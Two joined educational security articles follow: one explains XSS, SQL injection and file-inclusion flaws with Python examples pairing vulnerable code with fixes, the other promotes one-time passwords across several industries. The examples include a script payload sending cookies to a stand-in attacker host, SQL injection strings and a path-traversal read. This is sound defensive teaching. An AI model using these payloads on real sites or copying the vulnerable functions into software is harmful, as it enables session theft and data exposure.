
How could Web application (in)security affect me?

Nearly 55 percent of all vulnerability disclosures in 2008 affected web applications.

Web applications have become the major hunting ground for cyber criminals, who quite rightly view them as low-hanging fruit. Just as a new motorway gives traditional burglars and car thieves easier access to a town, a web application's internet accessibility delivers it straight to the hackers' door: it is reachable from anywhere, around the clock.

For some time now, cyber crime has simply been another arm of organised crime. And organised crime is pouring a substantial portion of its vast resources into cyber crime … because the return on investment is very high.

Organised crime goes to great lengths to get its hands on any information, and the more confidential it is, the better. Once they have broken into an application, they can either use the information themselves or sell it on to others. They can also take control of the servers and databases that house that information and turn a profit from those as well.

Having gained control of your computing power by exploiting vulnerabilities and planting their own code in your application, they add your machines to their existing haul to build botnets: global networks of compromised hosts reporting to a central command-and-control node. A botnet can be directed to attack other organisations, or rented or sold to other criminals who, once they control enough hosts, can mount denial-of-service attacks.

No longer is it enough for these criminals to boast of their hacking prowess; these days it is all about the money. A well-engineered denial-of-service attack is powerful enough to take a global multinational corporation, or even a small country's online services, off-line for as long as the attackers choose to sustain it. This is not about bragging rights; it is extortion, money-motivated from start to finish.

Because all information and all computing power is grist to the criminals' mill, no company is too small, and certainly no company is too big, to be targeted. And since security in large enterprises is often no better than in small ones, size is truly no barrier to the criminals.

And no business can afford the consequences of a security breach. At the very least, mismanaging confidential information almost always leads to reputational damage. Reputational damage leads to the departure of existing clients as well as difficulty attracting new business, a situation that can persist for many years. There are obvious bottom-line implications; in the most extreme cases, businesses go under.

According to IBM’s X-Force 2009 Mid-Year Trend and Risk Report, the predominant risks to web applications are from cross-site scripting, SQL injection and file include vulnerabilities.

Cross-site scripting (XSS) vulnerabilities occur when a web application places user-supplied input into a page without validating it and encoding it for the context it lands in, allowing criminals to embed their own script into a page the user is visiting. Because that script runs in the victim's browser under the application's own origin, it can steal session cookies and other confidential information, act on the user's behalf, or exploit vulnerabilities in the user's browser. Reflected XSS is typically exploited in phishing attacks: the criminals e-mail users a link to a page on the legitimate domain, with the script hidden in a URL parameter. The attack pays well because users trust the familiar domain name they are visiting and therefore trust the links (crafted by the criminals) within it.
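As an added illustration, not code from the original article, the following Python shows a reflected-XSS bug in a search-results page and the context-aware output encoding that fixes it. The page fragment, the `render_results_*` functions and the attacker payload are constructed for this example; the one real-world detail is that each output context (HTML text, quoted attribute, URL query component) needs its own encoding.

```python
import html
from urllib.parse import quote

# Constructed attacker input: what the ?q= parameter of a phishing link might carry.
# It closes the attribute it lands in and injects a script that leaks the session cookie.
PAYLOAD = '"><script>location="https://evil.example/?c="+document.cookie</script>'


def render_results_vulnerable(query: str) -> str:
    """Reflects the search term verbatim into three HTML contexts: reflected XSS."""
    return (
        "<h1>Results for: " + query + "</h1>\n"
        '<input name="q" value="' + query + '">\n'
        '<a href="/search?q=' + query + '">Search again</a>\n'
    )


def render_results_hardened(query: str) -> str:
    """Encodes the same input for each output context it lands in."""
    return (
        # HTML text node: escape & < > (html.escape also escapes quotes by default).
        "<h1>Results for: " + html.escape(query) + "</h1>\n"
        # Quoted attribute value: quotes must be escaped too, or the attribute can be closed.
        '<input name="q" value="' + html.escape(query, quote=True) + '">\n'
        # URL query component: percent-encode everything, including '/' and ':'.
        '<a href="/search?q=' + quote(query, safe="") + '">Search again</a>\n'
    )


def contains_injected_script(page: str) -> bool:
    """True if a raw <script> tag survived into the rendered page."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(render_results_vulnerable(PAYLOAD))
    print(render_results_hardened(PAYLOAD))
```

The hardened version still accepts any search term; it simply never lets the term change the structure of the page. Output encoding at the point of rendering, rather than input filtering alone, is what closes the hole, because the same string is dangerous in one context and harmless in another.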

SQL injection vulnerabilities also stem from improperly handled user input, but in this case the input is spliced into a query string so that fragments of it are executed as SQL by the database. That gives attackers the ability to read, modify and delete sensitive information (credit card data, for instance), and in some cases to write attacker-controlled content such as script tags into the database, so that other visitors to the site are attacked when that content is displayed to them.
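An added example, not from the original article: a Python lookup against an in-memory SQLite table, once with the user-supplied value spliced into the query string and once bound as a parameter. The `customers` table, its rows and the two attacker inputs are constructed sample data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a real customer table."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, username TEXT, card_last4 TEXT)"
    )
    con.executemany(
        "INSERT INTO customers (username, card_last4) VALUES (?, ?)",
        [("alice", "4242"), ("bob", "1881"), ("carol", "0005")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, username: str) -> list:
    """Builds the query by string concatenation: the input becomes part of the SQL."""
    sql = "SELECT username, card_last4 FROM customers WHERE username = '" + username + "'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, username: str) -> list:
    """Binds the input as a value; it can never change the query's structure."""
    return con.execute(
        "SELECT username, card_last4 FROM customers WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs.
# Tautology: the WHERE clause becomes  username = 'nobody' OR '1'='1' , matching every row.
TAUTOLOGY = "nobody' OR '1'='1"
# UNION: appends a second SELECT that reads the schema; '--' comments out the closing quote.
UNION_DUMP = "nobody' UNION SELECT name, sql FROM sqlite_master--"


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, TAUTOLOGY))      # every customer's card digits
    print(lookup_vulnerable(con, UNION_DUMP))     # the CREATE TABLE statement
    print(lookup_parameterized(con, TAUTOLOGY))   # []
```

The parameterised query is not "escaping done right"; the driver sends the value separately from the statement, so there is no point at which the attacker's quotes and keywords are parsed as SQL. The same applies to ORMs and prepared statements in any language, provided nothing concatenates user input into the statement text first.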

File-include vulnerabilities occur when the application can be induced to load and execute code from a source it does not validate, whether a file elsewhere on the server (local file inclusion) or, where the platform allows it, a remote URL under the attacker's control (remote file inclusion), allowing criminals to take over the web application. This category also includes some denial-of-service attacks, as well as path-traversal techniques that give criminals direct access to files, directories, user information and other components of the web application.
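An added example, not the article's own code: a Python page-include routine in the spirit of the classic `include($_GET['page'])` pattern, first trusting the parameter and then restricted to an allow-listed name that is resolved inside the pages directory. The site layout and file contents are constructed inline in a temporary directory; the hardened version never fetches URLs, which is what rules out the remote variant.

```python
import os
import re
import tempfile

# Allow-list for the page parameter: a short, plain name and nothing else.
PAGE_NAME = re.compile(r"^[a-z0-9_-]{1,32}$")


def setup_site() -> str:
    """Constructed site layout: a pages directory plus a secret outside it."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "pages"))
    with open(os.path.join(root, "pages", "about.html"), "w") as f:
        f.write("<p>About us</p>")
    with open(os.path.join(root, "config.ini"), "w") as f:
        f.write("db_password=hunter2\n")
    return root


def include_vulnerable(root: str, page: str) -> str:
    """Trusts the ?page= parameter. '../' walks out of the pages directory, and an
    absolute path such as /etc/passwd makes os.path.join discard the base entirely."""
    path = os.path.join(root, "pages", page)
    with open(path) as f:
        return f.read()


def include_hardened(root: str, page: str) -> str:
    """Allow-lists the name, appends the extension itself, and checks that the
    resolved path still lies inside the pages directory."""
    if not PAGE_NAME.match(page):
        raise ValueError("invalid page name")
    base = os.path.realpath(os.path.join(root, "pages"))
    path = os.path.realpath(os.path.join(base, page + ".html"))
    # Belt and braces: the regex already forbids separators, but a containment
    # check on the resolved path also survives symlinks and future regex changes.
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes pages directory")
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    root = setup_site()
    print(include_vulnerable(root, "../config.ini"))   # leaks the database password
    print(include_hardened(root, "about"))             # <p>About us</p>
```

Rejecting with an exception rather than silently serving a default page matters in practice: the failed attempts are the signal you want in your logs.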

Facilitating all these kinds of attacks is the fact that most web sites carry a good deal of code to support their various features and functions, and that code inadvertently introduces vulnerabilities.

Russian roulette, anyone?

Could A One Time Password Already Be Securing Your Industry?

Technology affects every aspect of our lives, especially our security. Luckily, new technology is always being created to help keep our lives more secure. As our lives become digitised, more and more sensitive information is being added to databases connected to networks or accessible from the web. This raises a red flag for anyone who has been affected by identity theft or fraud. With all of our personal data stored in so many places, it would seem that we are more vulnerable to malicious attacks than ever. That need not be the case: as technology changes the way we interact and share information, it is also changing the way we secure our data.

Two-factor authentication using a one-time password (OTP) has been around for decades, although the need for it has risen lately. As industries go paperless and wireless, they open the gate for hackers to siphon off private data. Education, financial services and healthcare all need stronger authentication, since they handle information that must be kept confidential.

OTP in Education

The education sector has long used electronic records to manage students. Those records sit on computers connected to a network for administrative use, the very same network that students reach from their laptops, tablets and smartphones.

Even on a password-protected network these records are vulnerable, since you do not need to be especially computer-savvy to use a key logger. A student could simply attach a hardware key logger to a teacher's computer, or install software that records keystrokes discreetly in the background, and so capture the teacher's login credentials and gain access to confidential information. A one-time password blunts this attack: a captured code is valid once, or only for a short time window, so replaying it later fails. (A key logger that relays credentials in real time can still race the legitimate login within that window, which is why the window must be kept short and each code accepted only once.)

Any agency that collects, maintains and stores sensitive student information is responsible for managing that data properly, as required by the Family Educational Rights and Privacy Act (FERPA). With that security being a statutory responsibility, and malicious attacks becoming easier to perform, many education agencies are protecting their confidential information with two-factor authentication based on a one-time password.

OTP for Financial Services

Identity fraud is most visible in the financial services industry for a good reason: it deals directly with money. As everywhere else, technology has changed the way we bank, with online banking offered by almost every bank, and that exposes account holders' identities. To protect them, a one-time password is used to authenticate online banking customers, for instance when they log in from an unfamiliar IP address. Two-factor authentication is also used to identify an account holder at almost every point of transaction, through a bank card (something you have) and a PIN (something you know).

OTP in Healthcare

The healthcare industry faces many changes as regulations demand greater security for patients' confidential information. With more sensitive data available to physicians over the internet, securing that information is critical. Authorising access to a patient's medical record is crucial, and a one-time password provides that assurance by identifying the physician before the OTP is issued and then allowing a single sign-on to the records systems. Even on mobile devices such as laptops and tablets, a zero-footprint approach can allow access to records without leaving any data on the device.

Transmitting data securely is the future of security in almost every industry. Information is power, and with almost every industry moving to wireless interaction between tablets, laptops and smartphones, hackers are using technology against us to gain that power. Securing that information through two-factor authentication and one-time password services is how technology will protect the very users it was put in place to help.
